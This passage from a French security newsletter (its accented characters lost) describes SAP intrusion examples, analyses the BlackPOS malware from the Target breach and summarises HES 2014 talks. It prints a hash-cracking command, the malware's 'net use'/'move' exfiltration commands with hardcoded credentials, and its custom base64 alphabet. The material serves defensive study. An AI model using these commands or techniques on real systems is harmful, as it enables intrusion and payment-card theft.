$ cat hashes.txtusername:ROOT $1194B48F14B9F-3F8DA1B181F14DEB70E7BDDD239$ john hashes.txt$ john --format=sapg hashes.txt


16

>>> Bonus #2 : Exemple dintrusion simple

Voici un cas concret dexploitation du manque de scurisation du protocole SAPDIAG.

Tout dabord on effectue une attaque de type Man-in-the-Middle entre un client lourd et les serveurs SAP puis on capture le trafic rseau. Il est alors possible dutiliser un plugin Wireshark (voir plus haut) pour dcoder le trafic :

On obtient ainsi un compte SAP valide, qui permet alors lutilisation du client SAPGUI, partir duquel on peut tenter dutili-ser des transactions dangereuses, SE49 ou SM69 par exemple, qui permettent lexcution de commandes sur le systme :

A partir dici, on se retrouve dans une configuration semblable celle dun scnario dintrusion interne en bote grise : un pied dans linfra SAP avec un compte de service, ouvrant tout un panel de nouvelles actions (rebond, lvation de privi-lges, vol dinformations, etc.). Il ny a plus qu ! , en somme :-)

Tests intrusion SAP


17

>>> Bonus #3 : Exemple dintrusion avance

Nous prsentons ici un exemple dintrusion ralis par les consultants du cabinet sur un environnement SAP. Lattaque sappuie sur lexploitation de plusieurs vulnrabilits afin de prendre le contrle total de linfrastructure SAP.

Le point de dpart de cette attaque est la dcouverte sur lun des serveurs de la prsence dun servlet de configuration accessible sans authentification. Or, ce servlet, joignable lURI /ctc/servlet, accepte plusieurs paramtres dont certains peuvent permettre lexcution de code distance sur le serveur.

Un code dexploitation est disponible au sein du framework Metasploit :

Il est alors ais de parcourir le systme la recherche de donnes intressantes. En loccurrence, les connecteurs de base de donnes sont prsents au sein de fichiers de configuration SAP ConfigTool.

Le fichier SecStore.property contient notamment les chanes de connexion aux bases Oracle, chiffres :


18

Et la cl de chiffrement est prsente au sein du fichier SecStore.key :

Puisque nous possdons la cl de chiffrement et que lalgorithme utilis est connu (Triple DES), nous pourrions implmenter rapidement un court programme ou un script se chargeant du dchiffrement. Mais pourquoi faire compliqu quand SAP nous fournit les outils dont nous avons besoin ?

Config Tool est un utilitaire fourni par SAP qui permet de mettre jour ses fichiers de configuration, sans pour autant rvler les mots de passe contenus dans le fichier. Les captures suivantes illustrent comment charger un fichier SecStore.properties et sa cl.

Les mots de passe sont masqus dans linterface, mais pour dchiffrer les noms dutilisateur, noms de base de donnes, adresses et port, il faut dchiffrer toute la chane. Tentons donc de gnrer un dump du tas mmoire de cette application Java :

En filtrant uniquement les chaines de caractres valides, on retrouve sans difficult toutes les informations de connexion, mots de passe inclus :


19

Ce mot de passe nous a alors permis de nous connecter une base de donnes Oracle hbergeant des donnes SAP et ainsi rcuprer les hashes de tous les utilisateurs et des administrateurs :

Mais surtout, le mme mot de passe est utilis pour protger linterface dadministration Web de NetWeaver, nous permet-tant de prendre le contrle total de lenvironnement SAP :

On notera que la simple protection du servlet ConfigServlet par un mcanisme dauthentification aurait suffi prvenir totalement cette intrusion...


20

> Analyse du malware BlackPOSNous vous prsentions dans le prcdent numro lattaque ayant cibl la socit Target Corp. en fin danne 2013. Cette attaque sappuyait sur le malware BlackPOS et avait entran le vol des donnes bancaires de plus de 40 millions de clients sur les serveurs montiques (POS) de Target.

En nous aidant de diverses analyses publies sur Internet [1][2], nous vous proposons une prsentation dtaille du malware et des modes opratoires utiliss lors de cette vaste attaque.

par Thomas LIAIGRE et Etienne BAUDIN

Aprs avoir dfini quelques notions utiles la bonne comprhension du dossier, nous vous proposerons un panorama gnral du mode opratoire utilis.

Nous nous focaliserons ensuite sur le fonctionnement dtaill du malware. Enfin, nous nous interrogerons sur les possibles lments de faiblesse ayant permis le droulement de cette attaque.

> Rappel gnral

Cette partie aborde quelques notions importantes pour la suite du dossier : nous dfinirons ce quest un POS ( serveur mon-tique en franais) et dtaillerons la structure dune piste de carte bancaire.

Serveur montique ou POS

Un Point of Sale en anglais, souvent abrg par POS, est une machine qui permet le traitement du paiement dun bien ou dun service par un client. Ce terme gnral dfinit un large panel dquipements : ordinateurs installs aux caisses des grandes surfaces, bornes de paiement de parking, bornes dachat de billets de train, etc.

BlackPOS

Seth

And

erso

n


21

Malgr leur aspect inhabituel, ces machines sont souvent des serveurs utilisant le systme Windows XP, ou une de ses va-riantes, comme WEPOS (Windows Embedded Point Of Sale). Une ou plusieurs applications sont ensuite excutes afin de permettre la ralisation et le traitement des paiements par les clients.

Bande magntique des cartes bancaires

Lorsquil valide un paiement par carte bancaire, le POS va lire lensemble des informations sur la bande magntique de la carte, aussi appele piste. Les informations contenues sur une piste de type 1 (IATA) sont structures de la manire ci-dessous et sont spares par des caractres de dlimitation (appels sparateurs ou sentinelles) :

BlackPOS

> Droulement de lattaque

A la suite des diverses informations publies sur Internet et grce lanalyse comportementale du malware, le cheminement gnral de lattaque ci-dessous a pu tre retrac.


22

Etape 1 : Infection de Fazio Mechanical, prestataire de Target

Lentreprise Fazio Mechanical est un prestataire en charge de la gestion du chauffage, ventilation et climatisation. Fazio Mechanical a t victime dune campagne de-mails vrols par le malware Citadel . Cette infection a permis la rcupra-tion didentifiants permettant daccder des applications exposes par la socit Target. [3]

Etape 2 : Compromission dun serveur dchange entre Target et ses prestataires

Target exposait des applications permettant de grer la gestion de projet et la facturation avec ses prestataires. En utilisant les identifiants rcuprs lors de ltape 1, les attaquants ont pu se connecter sur une de ces applications, la compromettre et accder au systme sous-jacent. [3]

Etape 3 : Compromission du rseau Target

Une fois le serveur dchange compromis, ils ont pu rebondir sur le rseau Target.

Cette tape est reprsente en flches discontinues car nous navons pas le dtail des actions ralises lors de la compromis-sion. Nous savons toutefois que des identifiants et des informations sur ladressage interne ont t rcuprs.

Etape 4 : Personalisation du malware BlackPOS

BlackPOS na pas t spcifiquement dvelopp pour Target puisque diverses variantes de ce malware, certaines antcdentes laffaire Target, ont t identifies. [4]

Nanmoins, lors de lanalyse du malware, nous constatons que des identifiants et des adresses IP internes spcifiques au contexte de Target sont cods en dur dans lexcutable. Cela indique quune version spcifique a t adapte au contexte Target.

Etape 5 : Installation du malware BlackPOS sur les serveurs montiques

Lors de la compromission du rseau (tape 3), les attaquant ont accd par rebond aux serveurs montiques. Une fois que le malware a t adapt leurs besoins (tape 4), les serveurs montiques ont t infects.

Linstallation du malware ncessite des privilges levs pour la cration dun service et la lecture de la mmoire. Aucune information concernant linstallation du malware ou lobtention de droits administrateurs sur les serveurs montiques na t dvoile.

Le malware tait charg de drober les pistes de cartes bancaires en mmoire, son fonctionnement sera dtaill dans les paragraphes suivants de ce dossier.

Etape 6 : Centralisation des donnes au sein du rseau Target

Cette attaque a cibl des serveurs montiques sur lensemble du territoire des Etats-Unis, ce qui constituait un nombre impor-tant de machines. Chaque POS transmettait quotidiennement les donnes bancaires drobes sur un serveur de centralisation contrl par les attaquants au sein du rseau Target.

Etape 7 : Dplacement des donnes vers un serveur dexfiltration

Une fois les donnes obtenues, celles-ci devaient tre exfiltres en dehors du rseau Target. Les donnes taient donc dpla-ces sur un serveur dexfiltration ayant la possibilit de communiquer avec lextrieur du rseau Target.

Etape 8 : Exfiltration des donnes

Les attaquants ont finalement exfiltr les donnes via le protocole FTP vers un serveur externe quils avaient pralablement compromis. Durant 2 semaines, les pirates ont ainsi t en mesure de drober 11 Go de donnes. [5]


23

> Fonctionnement gnral de BlackPOS

Lorsque BlackPOS est actif, il recherche la prsence dun processus nomm POS.exe . Cest ce processus qui est charg de la ralisation du paiement, et donc du traitement des cartes bancaires.

Lorsque le processus POS.exe est actif, BlackPOS parcourt la mmoire vive (RAM) de ce processus afin didentifier et de drober les informations bancaires.

Une fois ces donnes identifies, le malware les encode en base64 avec un alphabet spcifique (voir ci-aprs) et les stocker au sein du fichier winxml.dll cr dans le rpertoire C:\WINDOWS\SYSTEM32.Le fichier winxml.dll est ensuite transfr de manire rcurrente sur le serveur de centralisation.

Lorsque le processus POS.exe est actif, BlackPOS parcourt la mmoire vive (RAM) de ce processus afin didentifier et drober les informations bancaires.

Nous notons que la version du malware tudie nest pas trs perfectionne : le processus nessaie pas de se camoufler et est visible au sein du gestionnaire des tches. Par ailleurs, il nutilise pas les API Windows pour exfiltrer les informations mais uti-lise simplement linvite de commande Windows. De plus, aucun mcanisme dobfuscation na t utilis lors de la compilation du malware afin de compliquer sa rtro-ingnierie.

Nous vous proposons ci-dessous une analyse statique et dynamique dlments intressants de ce programme.

> Analyse statique de BlackPOS

Cration et lancement du service

Le binaire correspondant au malware est enregistr en tant que service Windows, et est configur pour se lancer chaque dmarrage du systme. On peut ds lors voir cet lment parmi les services Windows :

La dfinition des paramtres du service est dfinie dans le code ci-dessous.

On peut constater que le processus sinstalle en service en prcisant la dfinition du type de dmarrage (dmarrage automa-tique), le type de service (process win32), ou encore du nom du service (POSWDS).Cette action ncessite les droits administrateur sur la machine.


24

Scan des processus

Une fois le service lanc, le binaire va scanner les processus en cours dexcution et rechercher le processus pos.exe . Le malware va par la suite lire la mmoire de ce processus.

On peut ainsi observer dans le code assembleur lappel la fonction Windows ReadProcessMemory avec ses diffrents para-mtres :

+hProcess est un handle du processus en mmoire qui est lu ;+lpBaseAddress est un pointeur vers ladresse mmoire (appartenant au processus) partir de laquelle il faut lire ;+lpBuffer est un pointeur vers une zone tampon qui reoit le contenu de la mmoire ;+nSize est la quantit de donnes lire dans le processus spcifi ;+lpNumberOfBytesRead est un pointeur vers une variable qui reoit la quantit de donnes envoyes la zone tampon.Cet appel de fonction ncessite que lapplication dispose du privilge SeDebugPrivilege. Celui-ci est obtenu en excutant le programme avec les droits dadministrateur.

Centralisation des donnes bancaires

Lextraction des donnes contenues dans les pistes est ensuite opre. Afin dtre exfiltres, les donnes sont encodes en base64. Le base64 est une mthode reprsentant les donnes par groupe de 6 bits. Len-semble de ces valeurs possible est donc de 64 possi-bilits.

Chaque groupe de 6 bits est reprsent par un caractre spcifique. Cest ce quon appelle lalphabet base64.

BlackPOS


25

BlackPOS

Il est cependant possible de choisir un alphabet alternatif. Cest un procd couramment utilis au sein des malwares puisquil permet de mettre en place un chiffrement simplifi peu de frais (il est ncessaire de connatre lalphabet utilis pour dcoder le message).Dans le cas de BlackPOS, lalphabet utilis est le suivant : JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau .

Cette chane nest pas directement accessible dans le code assembleur, mais rsulte doprations de permutations sur la chane sNbrlSfyBM2PR57Tq3QeVpnW4+w8JOHK6CoguYxvk/IdZ0LXjUaAhGzDFmct9Ei1 .

Envoi des journaux dvnements

Par la suite, un thread est cr pour lupload des donnes bancaires prcdemment identifies. Cette opration va tre excu-te une fois toutes les sept heures. Aussi, elle ne sexcutera quentre 10h et 17h. Lide est de cacher le trafic rseau gnr par le malware au sein dun trafic normal dune journe de travail.

> Analyse dynamique de BlackPOS

Architecture de test

Afin dobserver le fonctionnement du malware, nous avons mis en place une architecture avec un POS victime infect et un serveur de centralisation. Comme nous le prcisions lors de la prsentation gnrale de lattaque, des informations spcifiques au contexte de Target (identifiants, adresses IP) sont codes en dur dans le malware.

Nous adaptons donc notre architecture ces informations afin que le malware fonctionne :

+ladresse IP du serveur de centralisation est 10.116.240.31 ;+le partage administratif C$ est actif sur le serveur de centralisation ;+la commande dextraction utilise le compte Best1_user pour se connecter sur la machine ou le domaine ttcopscli3acs . Nous nommons donc notre serveur de centralisation de cette manire afin dviter de ne pas avoir crer un domaine, et crons le compte Best1_user ;

+le mot de passe associ au compte Best1_user est BackupU$r ;Larchitecture mise en place est donc la suivante :


26

Rcupration de lchantillon du malware

Afin dinfecter notre architecture, nous avons d rcuprer un chantillon du malware. Le journaliste Brian Krebs a publi un rapport danalyse threatexpert [6] du malware. Nous nous sommes bas sur lempreinte de fichier MD5 (0xCE0296E2D77EC3B-B112E270FC260F274) publie dans cette analyse afin de rcuprer lchantillon sur le site www.virusshare.com.Afin de nous assurer que nous travaillons avec le bon fichier, nous vrifions lempreinte de celui-ci :

Nous avons nomm notre chantillon BlackPOS.exe durant la suite de cette tude. Celui-ci tait probablement nomm diff-remment au sein du rseau de Target.

Infection de la machine victime

Aprs avoir infect le POS, nous pouvons observer que le service POSWDS a bien t cr sur notre machine. Il est int-ressant de noter que la ralisation de cette action ncessite que le malware ait t excut avec les privilges administrateur. Ces privilges administrateur seront ensuite ncessaires au programme pour accder la mmoire des autres processus.

La prsence du processus que nous venons de crer peut tre observe dans le gestionnaire des tches :

Cration du processus POS.exe

Comme prsent prcdemment, le malware recherche la prsence dun processus nomm POS.exe et contenant des pistes de cartes bancaires.Nous ralisons donc un programme correspondant ces exigences, le code source est prsent ci-dessous. Vous reconnatrez les informations dune piste magntique (avec les caractres de sparation) au sein de la chane de caractres PAN_1.

Le programme boucle linfini afin de nous assurer que celui-ci sera actif simultanment BlackPOS.


27

Journalisation des pistes bancaires

Lorsque BlackPOS et notre processus POS.exe sont actifs, un fichier nomm winxml.dll est cr sur le serveur victime au sein du rpertoire C:\WINDOWS\system32. Comme prvu, les informations sont inintelligibles car elles sont encodes en base64 avec lalphabet spcifique.

Exfiltration des donnes

Une fois les donnes bancaires drobes, le malware va les transmettre au serveur de centralisation. A laide de lapplication Procmon, nous pouvons observer la squence de commande ralise par le malware pour lexfiltration des donnes.

La premire action ouvre une invite de commande et lui transmet la commande suivante net use S: \\10.116.240.31\c$\WINDOWS\twain32 /user:ttcopscli3acs\Best1_user BackupU$r . Cette action va monter un partage rseau du serveur de centralisation sur le lecteur S en utilisant le compte Best1_user.

La seconde action ouvre une invite de commandes et lui transmet la commande suivante move C:\WINDOWS\system32\winxml.dll S:\ hostnameVictime_jour_mois_heure.txt . Cette commande copie le fichier winxml.dll contenant les informa-tions encodes sur le serveur de centralisation au format hostnameVictime_jour_mois_heure.txt. Le fichier winxml.dll est ensuite supprim.

La dernire action ouvre une invite de commandes et excute la commande net use S: /del . Cela permet la suppression du partage rseau mont prcdemment.

La succession de ces actions est suffisament rapide pour rester invisible aux yeux dun utilisateur sur le systme.

Dcodage des donnes

Sur le serveur de centralisation, nous constatons ensuite la cration dun fichier contenant notre piste encode au sein du rpertoire C:\WINDOWS\twain_32 au format hostnameVictime_jour_mois_heure.txt :


28

Afin de les dcoder, nous utilisons le programme Python ci-dessous. Celui-ci utilise une base de correspondance entre lalpha-bet du malware et lalphabet base64 standard afin de rencoder les donnes en base64 standard. Il nous suffit ensuite de les dcoder.

Nous retrouvons la piste initialement renseigne dans notre programme POS.exe (la partie |ADD%| est ajoute par le malware lors du traitement de la chane) :

> Les points dinterrogations...

Target ayant t certifi PCI DSS en septembre 2013 [7][8], un certain nombre de bonnes pratiques auraient d tre respectes sur le primtre PCI ainsi que sur lensemble du SI. Pourtant, diverses questions se posent quant au respect de ces bonnes pratiques. Il ne sagit que de premires pistes de rflexions. Dautres exigences auraient d empcher un tel vol de donnes si elles avaient t correctement implmentes.

Scurit du serveur dchange Target-prestataires

Le premier point dinterrogation ne concerne pas le standard PCI DSS mais le respect de bonnes pratiques gnrales.Les attaquants nauraient pas d pouvoir prendre le contrle du serveur dchanges entre Target et ses prestataires. Cela pose la question de la scurit des applications exposes sur ce serveur (failles applicatives, configuration trop permissive, etc.) et de la ralisation daudits de scurit sur ce primtre.

Une fois le serveur compromis, les attaquants ne possdaient que les privilges du service compromis. Si ce service tait correctement configur, celui-ci aurait du fonctionner avec des comptes de services privilges restreints. Ils nauraient donc pas d pouvoir rebondir sur dautres systmes avec ces comptes (restriction des mthodes dauthentification des comptes de service au sein des GPO) ou excuter des actions permettant le rebond sur des serveurs tiers (vol de hashes, extraction des mots de passe en mmoire, etc.). Pourtant, les attaquants ont russi rebondir jusquaux POS sur lesquels ils disposaient des privilges dadministration (ncessaires pour linstallation du service malveillant).

Enfin, lutilisation de mthodes dauthentification fortes (tokens OTP) aurait empch la compromission de ce serveur partir des identifiants dun prestataire.

BlackPOS


29

Cloisonnement des flux entre les diffrentes zones

Le second point sensible concerne le cloisonnement des flux entre les diffrentes zones de Target, notamment si lon considre tle premier chaptre des exigences PCI DSS traitant de ce sujet ( Build and Maintain a Secure Network ).

Linterrogation porte spcifiquement sur les flux suivants :

+entre serveur dchange Target-Prestataire et les POS ;+entre le POS et le serveur de centralisation (SMB) ;+entre le serveur de centralisation et le serveur dexfil-tration ;

+entre le rseau de Target et lextrieur (FTP).Soit ces flux taient lgitimes, et nous ne comprenons pas forcment dans quel but, soit ces flux taient illgitimes et ils auraient du tre rejets et gnrer des alertes compte tenu du volume de donnes exfiltres.

Intgrit du systme des POS

Enfin, la recommandation 11.5 du standard PCI exige que des outils contrlent lintgrit des fichiers et des rper-toires sensibles des systmes dans le primtre. Cette rgle ne spcifie pas expressment les fichiers et rper-toires sensibles, mais il nous apparat vident que le r-pertoire SYSTEM32, contenant les excutables du systme, rentre dans cette catgorie. Ainsi une alerte aurait d tre leve lors de la cration du fichier winxml.dll dans ce r-pertoire.

Rfrences

+[1] http://h30499.www3.hp.com/t5/HP-Security-Re-search-Blog/An-evolution-of-BlackPOS-malware/ba-p/6359149

+[2] http://securityintelligence.com/target-data-breach-kaptoxa-pos-malware/

+[3] http://krebsonsecurity.com/2014/02/email-attack-on-vendor-set-up-breach-at-target/

+[4] http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/

+[5] http://krebsonsecurity.com/2014/01/a-closer-look-at-the-target-malware-part-ii/

+[6] http://krebsonsecurity.com/wp-content/uploads/2014/01/POSWDS-ThreatExpert-Report.pdf

+[7] http://www.businessinsider.my/target-was-war-ned-about-data-breach-2014-3/

+[8] http://www.pcworld.com/article/2111980/secu-rity-vendor-trustwave-named-in-targetrelated-suit.html

BlackPOS


30

> Jour 1

Keynote An amazing keynoteEdmond bigezey Rogers

Edmond Rogers, chercheur luniversit de lIllinois et animateur de la confrence, a ouvert le bal pour ces trois jours de confrence.

Edmond a commenc par un bref discours douverture. Il a insist sur la difficult quont les professionnels de la scu-rit caractriser les multiples vulnrabilits rencontres sur leurs systmes et isoler les informations pertinentes.Afin de raliser cette caractrisation, Edmond nous a pr-sent le modle CPTL (Cyber-Physical Topology Language), un modle bas sur la thorie des graphes ayant pour objectif lutilisation de mtriques comprhensibles par tous. Ce modle a t appliqu avec succs par des cher-cheurs afin de drouler un audit de vulnrabilits sur les infrastructures lectriques aux tats-Unis.

Lutilisation de ce modle, et dautres systmes adapts seront daprs lui ncessaires pour faire face aux nom-breuses vulnrabilits rencontres et scuriser les diff-rents systmes.

Hacking Telco equipment : The HLR/HSSLaurent Ghigonis

+Slideshttp://2014.hackitoergosum.org/slides/day1_Hacking-tel-co-equipment-The-HLR-HSS-Laurent-Ghigonis-p1sec.pdf

Laurent Ghigonis, consultant chez P1 security, a prsent une tude de la scurit des HLR (Home Location Register) et des HSS (Home Suscriber Server) au sein des rseaux de tlphonie mobile.

> Confrences scurit

HESpar Thomas LIAIGREArnaud REYGNAUD

Cyril LORENZETTO


31

Brian ont ralis une analyse de scurit de ces rseaux tant au niveau du front-end (communication radio entre les terminaux mobiles et les antennes) quau niveau du back-end (cur de rseau des oprateurs de tlphonie mobile).

Leur constat est que les rseaux LTE souffrent de diffrentes vulnrabilits permettant la reconnaissance dlments de larchitecture rseau (depuis les terminaux mobiles ou via le scan de plages IP doprateurs), le dchiffrement des communications entre les diffrents quipements et lin-tgration dantennes matrises par lattaquant au sein des rseaux doprateur.

Cette prsentation soulve la question de la confidentialit des changes utilisateurs via les terminaux mobiles sur les rseaux LTE.

WMI Shell : A new way to get shells on remote Win-dows machines using only the WMI serviceAndrei Dumitrescu

+Slideshttp://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf

+Outilshttps://www.lexsi.fr/conference/wmi-shell.zip

En dbut daprs-midi, Andrei Dimitrescu, consultant chez Lexsi, a ralis une prsentation sur les objets WMI (Win-dows Management Instrumentation) et la possibilit de les utiliser afin de compromettre un systme distant.

Les HLR/HSS sont les quipements du rseau responsables du stockage des donnes utilisateurs (identifiant et locali-sation de labonn, services souscrits, etc.). Ils sont massi-vement interconnects (Internet, rseau oprateur) et sap-puient sur un grand nombre de services et dapplications internes.

Les consultants de P1 ont constat quun HLR/HSS peut tre mis hors service laide de paquets forgs par un attaquant. Si ce dni de service cible lensemble des quipements du rseau dun oprateur, ce rseau sera entirement indis-ponible.

Par ailleurs, des vulnrabilits locales sont aussi prsentes puisquun utilisateur connect sur un HLR/HSS peut facile-ment lever ses privilges afin de devenir administrateur sur le systme.

Ces vulnrabilits soulvent donc le problme de la dispo-nibilit des rseaux mobiles et des possibilits quont les attaquants les compromettre.

LTE vs Darwin : The Evolution Strikes Back ?Hendrik Schmidt & Brian Butterly

+Slideshttp://2014.hackitoergosum.org/slides/day1_ERNW_LTEvs-Darwin_HES.pdf

Hendrik Schmidt et Brian Butterly, consultants chez ERNW, ont poursuivi la matine sur le thme de la scurit au sein des rseaux LTE (Long Term Evolution) de tlphonie mo-bile.

LTE est la norme la plus rcente des rseaux de tlpho-nie mobile, commercialise sous le nom de 4G. Hendrik et


32

Applying science to eliminate 100% of buffer over-flowsAndreas Bogk

Slideshttp://2014.hackitoergosum.org/slides/day1_Applying_science_to_eliminate_100%25_of_buffer_overflows_Andreas_bogk.pdf

Andreas Bogk est un membre actif du CCC (Chaos Compu-ter Club), actuellement architecte scurit pour applications mobiles au sein de la socit HERE.

Sa prsentation portait sur loutil SoftBoundCETS. Cet outil, intgrer dans le processus de compilation des binaires, permet de prvenir les vulnrabilits de type dpasse-ment de tampon (erreurs spatiales) et use-after-free (erreurs temporelles).

En plus de la prsentation de loutil, cette prsentation a permis un rappel des bonnes pratiques lors du dveloppe-ment en C (vrifications raliser, gestion de la mmoire partage).

Andreas a ralis la transposition de cet outil sur le systme dexploitation FreeBSD.

Les objets WMI permettent dobtenir des informations (uti-lisateurs, paramtrage rseau, processus) et de raliser des commandes (cration/suppression de processus, appel de commandes systmes) sur un systme Windows. Ces objets peuvent tre appels distance laide doutils spcifiques (wmic sur Windows et wmis sur Linux).

Andrei a dvelopp un outil nomm wmi-shell permet-tant dutiliser ces proprits dappel distance lors dun test dintrusion. Lauditeur spcifie des commandes qui seront passes au systme distant. Si des informations sont ex-filtrer, elles seront crites dans un fichier temporaire et ra-patries sur le systme de lauditeur.

La ralisation de cette action ncessite louverture du port 135 sur le systme distant et la possession des identifiants/hash dun compte habilit requter les objets WMI.

> INFOHack In Paris : 4me round

Pour la 4me anne conscutive, la confrence Hack In Paris se droulera au Centre des Confrences de Disneyland Paris. Ras-semblant les grands noms de la scurit informatique et du hacking, lvnement est devenu incontournable pour les pro-fessionnels de la scurit.

Les confrences, au nombre de 16, proposes exclusivement en anglais runiront les professionnels de la scurit informatique (DSI, RSSI, RSI) et les experts techniques du hacking. Lvne-ment se tiendra du 26 au le 27 juin au Centre de Congrs de Dis-neyland Paris. A noter, chaque place achete pour Hack in Paris donne accs la Nuit du Hack qui se droulera les 28 et 29 juin !

Lvnement comporte galement 10 formations proposes par des experts techniques sur 3 jours du 23 au 25 juin.

XMCO sera partenaire mdia et proposera un rsum des conf-rences au sein du numro #38 de lActuScu.

HES


33

> Jour 2

Vaccinating APKsMilan Gabor & Danijel Grah

+Slideshttp://2014.hackitoergosum.org/slides/day2_Vaccinating_APK%E2%80%99s_Hackito-2014-MilanGabor-DanijelGrah.pdf

La premire confrence de la journe, prsente par Milan Gabor et Danijel Grah (deux chercheurs de lentreprise slo-vne Viris spcialise en scurit informatique), part dun constat simple : Android est selon les statistiques, le sys-tme mobile le plus cibl par les pirates.

Cette problmatique est essentiellement lie aux tests des applications qui nentrent pour ainsi dire plus dans le pro-cessus de dveloppement. Autre constat, les dveloppeurs comme les utilisateurs sont davantage concentrs sur les fonctionnalits plutt que sur les composants de scurit. Tous ces lments offrent donc de multiples vecteurs dat-taques.

Aprs avoir rappel les bases des applications Android (quest-ce quun .apk, Java, principe des Activities, Services, etc.), les deux confrenciers ont voqu les mthodes per-mettant de reverser des applications en listant quelques outils utiliss (Dex2Jar, JD-GUI, etc.) ainsi quen rappelant la diffrenciation entre analyse statique (lecture du code) et dynamique (monitoring, remoting, debugging, etc.).Ils ont ensuite prsent leur projet permettant dinjecter un service au sein dune application via lutilisation des outils Fino et BeanShell. Ils peuvent ensuite analyser et modifier le comportement de lapplication lors de son excution (modification des valeurs des variables, appels de fonctions arbitraires, excution de code Java).

Une dmonstration a t ralise leur permettant de tri-cher dans des jeux (la modification des variables en temps rel leur permettant dobtenir le meilleur score), mais cela pourrait galement servir envoyer des SMS durgence (classe 0), consulter des informations normalement inac-cessibles, etc.

Lobjectif est dsormais de tout runir en un seul et mme outil et si possible dinjecter le service en amont et non en rinstallant lAPK.

The government as your hacking partner: using public data to block passports, national ID cards, steal tax data, and other mischievous deedsJos Garduo

Jos Garduo a ensuite prsent une tude opposant la po-litique de publication des donnes du gouvernement chilien (transparence de linformation) au respect de la vie prive.

Jos est parti dlments publis sans restriction sur les bases de donnes du gouvernement (nom, adresse, num-ro didentit, sexe). Ces informations ont pu tre utilises pour obtenir dautres donnes. De proche en proche, il a ainsi pu raliser une cartographie complte des informa-tions accessibles pour nimporte quel citoyen chilien (fa-mille, numro dimmatriculation, numro de passeport, donnes mdicales, fonds de pension, etc.).

Les informations obtenues sont suffisantes pour usurper une identit ou raliser des actions la place dune per-sonne (rvocation ou cration de documents officiels, rcu-pration dactes de naissance/mariage/dcs, etc.).Il a galement dvelopp un outil (bas sur le framework python Django et sur diverses bibliothques) permettant dautomatiser cette agrgation dlments didentit.

Il a par ailleurs ralis une application de phishing utilisant ces lments. Lapplication simule le comportement dun serveur vocal interactif afin de demander lutilisateur des informations confidentielles complmentaires.

Il a ensuite largi cette problmatique de la confidentia-lit des donnes personnelles en ajoutant quen plus des donnes publies par le gouvernement, les utilisateurs publient eux aussi de nombreuses informations sensibles (rseaux sociaux, blogs, etc.).


34

Hardware Security Modules: attacks and secure confi-gurationGraham Steel

+Slideshttp://2014.hackitoergosum.org/slides/day2_Hardware_Security_Modules:attacks_and_secure_configuration_Gra-ham_Steel_hes2014.pdf

Graham Steel a ensuite parl des Modules Matriel de S-curit (HSM). Les HSM sont des quipements cryptogra-phiques ayant pour fonction de conserver les cls prives dans les infrastructures de gestion des cls (applications gouvernementales, guichets automatiques, systmes de paiement). Ces quipements et leur contenu sont rputs inviolables.

Graham prend pour exemple la gnration de code PIN par un HSM, et montre quen influant sur les diffrentes entres fournies lquipement, et laide de multiples essais, il est possible dobtenir des informations partielles sur le PIN gnr (valeur de certains chiffres du PIN), voir le PIN com-plet.

Afin dillustrer ces principes, Graham a prsent les diff-rentes attaques dj connues et les informations quelles permettent de rcuprer ( ISO-0 Reformatting attack , Extended Reformat Attack , Statistical Attack , etc.)

OSMOSIS Open Source Monitoring Security IssuesChristian Sielaff & Daniel Hauenstein

+Slideshttp://2014.hackitoergosum.org/slides/day2_OSMOSIS_HES2014.pdf

Pour terminer cette seconde journe, Christian Sielaff & Daniel Hauenstein ont prsent OSMOSIS (Open Source Monitoring Security Issues). La principale question tait : Comment profiter des solutions de supervision afin de com-promettre un rseau ?

Afin de mener bien leur tude, ils ont examin plusieurs solutions bases sur des logiciels Open Source (CACTI, NA-GIOS, ICINGA, Check_mk). Ces dernires prsentent de nombreux avantages : libres et gratuites, mais la scurit et les failles lies peuvent apporter de nombreuses problma-tiques sur un rseau.

Lanalyse de ces produits a permis didentifier de nom-breuses failles (XSS, des CSRF, des RCE, Buffer Overflow, etc.) les ayant conduits jusqu lobtention dun Shell persistant. Ceci leur a permis de contourner les restrictions rseau et de rebondir vers le rseau interne de lentreprise.

Enfin, des solutions de mitigation ont t prsentes afin de prvenir ces attaques (il sagit dans la plupart des cas de bonnes pratiques mettre en place ct dveloppement).

Les vulnrabilits ont t remontes aux diteurs, mais seuls NAGIOS et Icinga ont ralis une mise jour de leur application. Dautres diteurs se sont montrs moins colla-boratifs (absence de rponse, rejet de laudit, etc.)

HES


35

> Jour 3

Suricata 2.0, Netfilter and the PRCric Leblond

+Slideshttp://2014.hackitoergosum.org/slides/day3_suricata_net-filter_prc_eric_leblond.pdf

Cette troisime et dernire journe de confrence fut ini-tie par ric Leblond. Ce dernier a prsent les amliora-tions sur lapplication Suricata.Suricata est un IDS (Intrusion Detection System) Open Source charg didentifier les activits suspectes au niveau des trames rseau, en se basant sur des rgles dfinies par ladministrateur laide du langage LUA.

Pour cela, Suricata sappuie sur une architecture multithread performante afin dexploiter pleinement les ressources des systmes modernes et une identification des protocoles de manire prcise afin de permettre une bonne granularit des rgles et rduire le nombre de faux positifs.Les capacits de cet outil permettent la ralisation de nom-breuses tches : extraction des fichiers transitant sur le r-seau, vrification de la validit des chanes de certification lors dune connexion entre un client et un serveur distant (prvention des attaques par interception de flux), etc. Il offre de plus une lecture facilite des logs via une interface sduisante et permettant lextraction de statistiques (repr-sentation sous forme de graphiques, camemberts, etc.).

La prsentation a t illustre par la dtection par Su-ricata de requtes malveillantes ciblant la vulnrabilit Heartbleed.

Suricata avait t dvelopp par Victor Julien et Matthew Konkmann, qui ont fond pour cela la fondation Open Infor-mation Security Foundation (OISF). Il offre une alternative de plus en plus crdible face son concurrent Snort.

Worldwide attacks on SS7 networkAlexandre De Oliveira & Pierre-Olivier Vauboin

+Slideshttp://2014.hackitoergosum.org/slides/day3_Worldwide_attacks_on_SS7_network_P1security_Hackito_2014.pdf

Alexandre De Oliveira et Pierre-Olivier Vauboin, consultants chez P1 Security, ont prsent des attaques ralisables sur les rseaux de tlphonie mobile. Ces attaques exploitent des vulnrabilits au niveau du cur de rseau de lopra-teur et au niveau des terminaux mobiles.

La prsentation a commenc par un rappel des composants et du fonctionnement des architectures tlcom (2G/3G). Alexandre et Pierre-Olivier ont ensuite insist sur le fonc-tionnement du protocole SS7, utilis pour les changes entre les composants du rseau.

